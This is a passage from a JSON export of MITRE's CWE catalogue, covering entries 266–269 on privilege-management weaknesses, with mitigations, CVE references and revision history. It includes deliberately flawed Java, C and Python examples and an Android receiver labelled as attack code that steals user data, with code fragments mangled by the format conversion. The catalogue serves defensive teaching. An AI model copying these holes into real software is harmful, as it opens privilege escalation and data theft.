expiration."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A system requires the changing of passwords every five years."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Allowing password aging"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"16"}},{"attr":{"@_CAPEC_ID":"49"}},{"attr":{"@_CAPEC_ID":"509"}},{"attr":{"@_CAPEC_ID":"55"}},{"attr":{"@_CAPEC_ID":"555"}},{"attr":{"@_CAPEC_ID":"560"}},{"attr":{"@_CAPEC_ID":"561"}},{"attr":{"@_CAPEC_ID":"565"}},{"attr":{"@_CAPEC_ID":"600"}},{"attr":{"@_CAPEC_ID":"652"}},{"attr":{"@_CAPEC_ID":"653"}},{"attr":{"@_CAPEC_ID":"70"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 19: Use of Weak Password-Based Systems.&#34; Page 279"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Allowing Unchecked Password Aging","attr":{"@_Date":"2008-04-11"}}}},"266":{"attr":{"@_ID":"266","@_Name":"Incorrect Privilege Assignment","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A product incorrectly assigns a privilege to a particular actor, creating an unintended sphere of control for that actor.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"269","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"286","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"A user can access restricted functionality and/or sensitive information that may include administrative functionality and user accounts."}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-97"},"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"seteuid(0);seteuid(getuid());","xhtml:br":["","",""],"xhtml:i":"/* do some stuff */"}}},{"attr":{"@_Demonstrative_Example_ID":"DX-142"},"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"AccessController.doPrivileged(new PrivilegedAction() {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public Object run() {}","xhtml:div":{"#text":"System.loadLibrary(\\"awt\\");return null;","attr":{"@_style":"margin-left:10px;"},"xhtml:i":["// privileged code goes here, for example:","// nothing to return"],"xhtml:br":["","","",""]}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-108"},"Intro_Text":"This application sends a special intent with a flag that allows the receiving application to read a data file for backup purposes.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Intent intent = new Intent();intent.setAction(\\"com.example.BackupUserData\\");intent.setData(file_uri);intent.addFlags(FLAG_GRANT_READ_URI_PERMISSION);sendBroadcast(intent);","xhtml:br":["","","",""]}},{"attr":{"@_Nature":"attack","@_Language":"Java"},"xhtml:div":{"#text":"public class CallReceiver extends BroadcastReceiver {}","xhtml:div":{"#text":"@Overridepublic void onReceive(Context context, Intent intent) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"Uri userData = intent.getData();stealUserData(userData);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}],"Body_Text":"Any malicious application can register to receive this intent. Because of the FLAG_GRANT_READ_URI_PERMISSION included with the intent, the malicious receiver code can read the user\'s data."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1193","Description":"untrusted user placed in unix \\"wheel\\" group","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1193"},{"Reference":"CVE-2005-2741","Description":"Product allows users to grant themselves certain rights that can be used to escalate privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2741"},{"Reference":"CVE-2005-2496","Description":"Product uses group ID of a user instead of the group, causing it to run with different privileges. This is resultant from some other unknown issue.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2496"},{"Reference":"CVE-2004-0274","Description":"Product mistakenly assigns a particular status to an entity, leading to increased privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0274"}]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Incorrect Privilege Assignment"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC00-J","Entry_Name":"Do not allow privileged blocks to leak sensitive information across a trust boundary"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC01-J","Entry_Name":"Do not allow tainted variables in privileged blocks"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-76"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"267":{"attr":{"@_ID":"267","@_Name":"Privilege Defined With Unsafe Actions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A particular privilege, role, capability, or right can be used to perform unsafe actions that were not intended, even when it is assigned to the correct entity.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"269","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"A user can access restricted functionality and/or sensitive information that may include administrative functionality and user accounts."}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-127"},"Intro_Text":"This code intends to allow only Administrators to print debug information about a system.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public enum Roles {}public void printDebugInfo(User requestingUser){}","xhtml:div":[{"#text":"ADMIN,USER,GUEST","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(isAuthenticated(requestingUser)){}else{}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"switch(requestingUser.role){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case GUEST:default:","xhtml:div":[{"#text":"System.out.println(\\"You are not authorized to perform this command\\");break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.out.println(currentDebugState());break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":""}}}},{"#text":"System.out.println(\\"You must be logged in to perform this command\\");","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}],"xhtml:br":["",""]}},"Body_Text":"While the intention was to only allow Administrators to print the debug information, the code as written only excludes those with the role of \\"GUEST\\". Someone with the role of \\"ADMIN\\" or \\"USER\\" will be allowed access, which goes against the original intent. An attacker may be able to use this debug information to craft an attack on the system."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1981","Description":"Roles have access to dangerous procedures (Accessible entities).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1981"},{"Reference":"CVE-2002-1671","Description":"Untrusted object/method gets access to clipboard (Accessible entities).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1671"},{"Reference":"CVE-2004-2204","Description":"Gain privileges using functions/tags that should be restricted (Accessible entities).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2204"},{"Reference":"CVE-2000-0315","Description":"Traceroute program allows unprivileged users to modify source address of packet (Accessible entities).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0315"},{"Reference":"CVE-2004-0380","Description":"Bypass domain restrictions using a particular file that references unsafe URI schemes (Accessible entities).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0380"},{"Reference":"CVE-2002-1154","Description":"Script does not restrict access to an update command, leading to resultant disk consumption and filled error logs (Accessible entities).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1154"},{"Reference":"CVE-2002-1145","Description":"\\"public\\" database user can use stored procedure to modify data controlled by the database owner (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1145"},{"Reference":"CVE-2000-0506","Description":"User with capability can prevent setuid program from dropping privileges (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0506"},{"Reference":"CVE-2002-2042","Description":"Allows attachment to and modification of privileged processes (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2042"},{"Reference":"CVE-2000-1212","Description":"User with privilege can edit raw underlying object using unprotected method (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1212"},{"Reference":"CVE-2005-1742","Description":"Inappropriate actions allowed by a particular role(Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1742"},{"Reference":"CVE-2001-1480","Description":"Untrusted entity allowed to access the system clipboard (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1480"},{"Reference":"CVE-2001-1551","Description":"Extra Linux capability allows bypass of system-specified restriction (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1551"},{"Reference":"CVE-2001-1166","Description":"User with debugging rights can read entire process (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1166"},{"Reference":"CVE-2005-1816","Description":"Non-root admins can add themselves or others to the root admin group (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1816"},{"Reference":"CVE-2005-2173","Description":"Users can change certain properties of objects to perform otherwise unauthorized actions (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2173"},{"Reference":"CVE-2005-2027","Description":"Certain debugging commands not restricted to just the administrator, allowing registry modification and infoleak (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2027"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unsafe Privilege"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"58"}},{"attr":{"@_CAPEC_ID":"634"}},{"attr":{"@_CAPEC_ID":"637"}},{"attr":{"@_CAPEC_ID":"643"}},{"attr":{"@_CAPEC_ID":"648"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-76"}}},"Notes":{"Note":{"attr":{"@_Type":"Maintenance"},"xhtml:p":"Note: there are 2 separate sub-categories here:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["- privilege incorrectly allows entities to perform certain actions","- object is incorrectly accessible to entities with a given privilege"]}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Maintenance_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}],"Previous_Entry_Name":{"#text":"Unsafe Privilege","attr":{"@_Date":"2008-04-11"}}}},"268":{"attr":{"@_ID":"268","@_Name":"Privilege Chaining","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Two distinct privileges, roles, capabilities, or rights can be combined in a way that allows an entity to perform unsafe actions that would not be allowed without that combination.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"269","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"A user can be given or gain access rights of another user. This can give the user unauthorized access to sensitive information including the access information of another user."}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-49"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource."},{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-128"},"Intro_Text":"This code allows someone with the role of \\"ADMIN\\" or \\"OPERATOR\\" to reset a user\'s password. The role of \\"OPERATOR\\" is intended to have less privileges than an \\"ADMIN\\", but still be able to help users with small issues such as forgotten passwords.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public enum Roles {}public void resetPassword(User requestingUser, User user, String password ){}","xhtml:div":[{"#text":"ADMIN,OPERATOR,USER,GUEST","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(isAuthenticated(requestingUser)){else{}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"switch(requestingUser.role){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case GUEST:case USER:default:}","xhtml:div":[{"#text":"System.out.println(\\"You are not authorized to perform this command\\");break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.out.println(\\"You are not authorized to perform this command\\");break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"setPassword(user,password);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""]}}}},{"#text":"System.out.println(\\"You must be logged in to perform this command\\");","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}],"xhtml:br":["",""]}},"Body_Text":"This code does not check the role of the user whose password is being reset. It is possible for an Operator to gain Admin privileges by resetting the password of an Admin account and taking control of that account."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-1736","Description":"Chaining of user rights.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1736"},{"Reference":"CVE-2002-1772","Description":"Gain certain rights via privilege chaining in alternate channel.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1772"},{"Reference":"CVE-2005-1973","Description":"Application is allowed to assign extra permissions to itself.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1973"},{"Reference":"CVE-2003-0640","Description":"\\"operator\\" user can overwrite usernames and passwords to gain admin privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0640"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Privilege Chaining"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-76"}}},"Notes":{"Note":[{"#text":"There is some conceptual overlap with Unsafe Privilege.","attr":{"@_Type":"Relationship"}},{"#text":"It is difficult to find good examples for this weakness.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Other_Notes, Potential_Mitigations, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples"}]}},"269":{"attr":{"@_ID":"269","@_Name":"Improper Privilege Management","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-48"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"Follow the principle of least privilege when assigning access rights to entities in a software system."},{"attr":{"@_Mitigation_ID":"MIT-49"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-126"},"Intro_Text":"This code temporarily raises the program\'s privileges to allow creation of a new user folder.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"def makeNewUserDir(username):","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if invalidUsername(username):try:except OSError:return True","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"print(\'Usernames cannot contain invalid characters\')return False","xhtml:br":["","",""],"xhtml:i":"#avoid CWE-22 and CWE-78"}},{"#text":"raisePrivileges()os.mkdir(\'/home/\' + username)lowerPrivileges()","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"print(\'Unable to create new user directory for user:\' + username)return False","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["","",""]}}}},"Body_Text":"While the program only raises its privilege level to create the folder and immediately lowers it again, if the call to os.mkdir() throws an exception, the call to lowerPrivileges() will not occur. As a result, the program is indefinitely operating in a raised privilege state, possibly allowing further exploitation to occur."},{"attr":{"@_Demonstrative_Example_ID":"DX-97"},"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"seteuid(0);seteuid(getuid());","xhtml:br":["","",""],"xhtml:i":"/* do some stuff */"}}},{"attr":{"@_Demonstrative_Example_ID":"DX-142"},"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"AccessController.doPrivileged(new PrivilegedAction() {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public Object run() {}","xhtml:div":{"#text":"System.loadLibrary(\\"awt\\");return null;","attr":{"@_style":"margin-left:10px;"},"xhtml:i":["// privileged code goes here, for example:","// nothing to return"],"xhtml:br":["","","",""]}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-127"},"Intro_Text":"This code intends to allow only Administrators to print debug information about a system.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public enum Roles {}public void printDebugInfo(User requestingUser){}","xhtml:div":[{"#text":"ADMIN,USER,GUEST","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(isAuthenticated(requestingUser)){}else{}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"switch(requestingUser.role){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case GUEST:default:","xhtml:div":[{"#text":"System.out.println(\\"You are not authorized to perform this command\\");break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.out.println(currentDebugState());break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":""}}}},{"#text":"System.out.println(\\"You must be logged in to perform this command\\");","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}],"xhtml:br":["",""]}},"Body_Text":"While the intention was to only allow Administrators to print the debug information, the code as written only excludes those with the role of \\"GUEST\\". Someone with the role of \\"ADMIN\\" or \\"USER\\" will be allowed access, which goes against the original intent. An attacker may be able to use this debug information to craft an attack on the 